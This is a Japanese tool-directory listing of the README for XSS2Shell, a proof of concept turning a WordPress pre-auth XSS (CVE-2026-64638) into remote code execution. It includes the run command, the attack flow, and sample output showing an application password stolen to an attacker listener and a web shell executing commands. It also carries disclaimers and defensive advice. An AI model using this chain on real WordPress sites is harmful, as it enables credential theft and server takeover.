Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
XSS2Shell — WordPress 事前認証 XSS から RCE へのエクスプロイト PoC (xss2shell & CVE-2026-64638) | Kitploit
ツール/GitHubGitHub/wordsec/xss2shell
ペイロード生成エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテスト学習と教育
GitHubwordsec/xss2shell

XSS2Shell

WordPress 事前認証 XSS から RCE へのエクスプロイト PoC (xss2shell & CVE-2026-64638)

リポジトリを見る
71151ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

XSS2Shell

XSS2Shell は、CVE-2026-64638 の教育的な概念実証(PoC)であり、脆弱な WordPress インストールにおける事前認証 XSS 問題の影響を示すものです。管理者が明示的に参加することで、PoC は WordPress アプリケーションパスワードを取得し、一時ページを公開し、テストプラグインをアップロードし、生成されたシェルエンドポイントがコマンドを実行できるかどうかを確認します。

技術的背景: WordPress の事前認証 XSS から RCE へ: CVE-2026-64638

教育および許可を得たテストのみを対象としています。 このツールは、自分が所有する、または書面による評価の許可を得た WordPress サイトに対してのみ実行してください。第三者の管理者や本番システムを標的にしないでください。

要件

  • Python 3.7 以降
  • 到達可能な WordPress テスト環境
  • ターゲットにログインして攻撃者 URL を開くことができる管理者
  • 管理者のブラウザからリスナーアドレスへのネットワークアクセス
  • サードパーティ製 Python パッケージが不要

使用方法

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

オプション

オプション必須説明
-t, --target必須WordPress のベース URL。http:// または https:// を含む
-c, --command必須シェルが利用可能になった後に実行するコマンド
--lhost任意バインドおよび通知するリスナー IP。検出された LAN IP がデフォルト
--lport任意リスナーポート。0 を指定するとランダムな空きポートが選択される
--keep任意一時ページを削除せず、公開した成果物を保持する

ターゲット URL は自動的に正規化されるため、末尾のスラッシュは省略可能です。

操作の流れ

  1. ツールは /wp-login.php に到達可能であり、WordPress のログインページのように見えることを確認します。
  2. ローカル HTTP リスナーを起動し、リスナー URL を出力します。
  3. 許可を得た管理者がターゲットにログインし、その URL を開きます。
  4. ブラウザフローがアプリケーションパスワードを要求し、その結果をリスナーに送信します。
  5. PoC は取得した認証情報を使用して、攻撃者の一時ページを公開します。
  6. そのページは管理者のセッションでテストプラグインをアップロードします。
  7. ツールは shell.php を検証し、要求されたコマンドを実行します。

リスナーは管理者のブラウザから到達可能である必要があります。NAT、ファイアウォール、プロキシ、ポップアップブロック、および混在コンテンツのルールによって、ブラウザフローが完了しない場合があります。

出力例

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

成果物とクリーンアップ

実行に成功すると、取得したアプリケーションパスワードが xss2shell_creds.json に保存され、後続の実行で再利用できます。一時的に公開されたページは、--keep が指定されない限り、コマンド実行後に自動的に削除されます。

現在の PoC では、テストプラグイン、シェルエンドポイント、アプリケーションパスワード、および保存された認証情報は意図的に保持されます。許可を得た評価の後、テストサイトから手動で削除し、ローカルの xss2shell_creds.json も削除してください。

認証情報ファイルは機密情報として扱い、バージョン管理にコミットしないでください。

防御の指針

  • WordPress を CVE-2026-64638 の影響を受けないバージョンに更新する。
  • 管理者の強力な認証を徹底し、2FA を有効にする。
  • プラグインのインストールとアプリケーションパスワードの作成を信頼できるロールに制限する。
  • テスト後、管理者のアプリケーションパスワード、公開ページ、最近インストールされたプラグインを確認する。
  • プラグインのアップロードおよび REST エンドポイントへの不審なリクエストを監視し、ブロックする。

ライセンス

このリポジトリに含まれるライセンスを使用してください。

作成: WordSec

ツールをダウンロード